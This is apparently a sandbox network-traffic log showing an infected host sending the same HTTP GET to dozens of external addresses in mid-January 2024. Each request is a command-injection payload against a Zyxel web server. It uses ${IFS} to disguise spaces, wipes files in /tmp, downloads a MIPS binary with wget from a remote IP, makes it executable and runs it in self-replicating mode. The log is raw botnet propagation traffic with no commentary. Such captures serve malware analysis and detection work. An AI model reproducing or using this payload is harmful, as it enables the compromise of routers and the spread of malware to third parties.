                                          Jan 14, 2024 15:46:22.111637115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5646192.168.2.2351298175.90.242.86443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111687899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5647192.168.2.2349540167.107.84.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111692905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5648192.168.2.235935631.37.237.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111725092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5649192.168.2.2343172110.3.121.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111752987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5650192.168.2.2351774115.220.30.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111795902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5651192.168.2.233997064.62.209.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111814022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5652192.168.2.235410823.121.245.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111840963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5653192.168.2.2357038160.137.90.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111848116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5654192.168.2.235841479.187.251.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111876965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5655192.168.2.2349844128.145.10.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111932039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5656192.168.2.2345668144.53.133.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111948967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5657192.168.2.234575258.236.135.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.111968994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5658192.168.2.2347958188.64.120.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112004042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5659192.168.2.234558074.104.125.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112030029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5660192.168.2.2359612206.174.95.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112051964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5661192.168.2.2348424183.175.40.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112056017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5662192.168.2.2343022206.241.17.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112109900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5663192.168.2.2350808142.237.45.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112134933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5664192.168.2.234558843.82.229.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112159014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5665192.168.2.234980050.73.102.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112180948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5666192.168.2.2356330170.184.20.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112216949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5667192.168.2.2344150190.148.60.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112226963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5668192.168.2.2348766179.117.220.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112266064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5669192.168.2.234177044.19.236.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112288952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5670192.168.2.2354072179.9.158.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112302065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5671192.168.2.2338478153.161.110.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112379074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5672192.168.2.233660672.75.227.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112401962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5673192.168.2.2343902116.48.135.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112402916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5674192.168.2.2351682126.219.224.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112442017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5675192.168.2.2359686136.137.14.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112468958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5676192.168.2.233299882.146.0.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112502098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5677192.168.2.2356128161.249.56.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112533092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5678192.168.2.235198494.19.225.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112550974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5679192.168.2.2333896114.67.58.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112580061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5680192.168.2.2356038203.129.175.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112595081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5681192.168.2.234278095.106.207.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112646103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5682192.168.2.235423646.154.217.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112687111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5683192.168.2.2338664158.46.212.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112699032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5684192.168.2.2337890122.65.96.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112711906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5685192.168.2.2347702216.72.195.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112735033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5686192.168.2.2343962146.29.254.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112749100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5687192.168.2.2353506169.82.159.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112780094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5688192.168.2.2356678100.30.30.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112786055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5689192.168.2.2337002205.140.160.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112838030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5690192.168.2.2349990204.57.177.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112857103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5691192.168.2.2345750135.205.219.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112869024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5692192.168.2.2356230201.246.84.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112900019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5693192.168.2.2359844195.190.152.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112951040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5694192.168.2.234711890.31.94.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112956047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5695192.168.2.2354174172.65.59.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.112982035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5696192.168.2.233951098.214.126.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113006115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5697192.168.2.2357814144.151.40.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113049030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5698192.168.2.234579018.14.141.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113078117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5699192.168.2.233460618.160.220.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113092899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5700192.168.2.235789675.224.28.165443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113123894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5701192.168.2.233456646.132.233.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113152027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5702192.168.2.2360016177.46.80.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113192081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5703192.168.2.234027269.94.87.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113234997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5704192.168.2.2335928165.60.140.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113249063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5705192.168.2.234230445.179.189.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113267899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5706192.168.2.2334162103.24.245.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113316059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5707192.168.2.233852857.77.133.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:22.113336086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5708192.168.2.2336402129.67.115.239443
                                          TimestampBytes transferredDirectionData
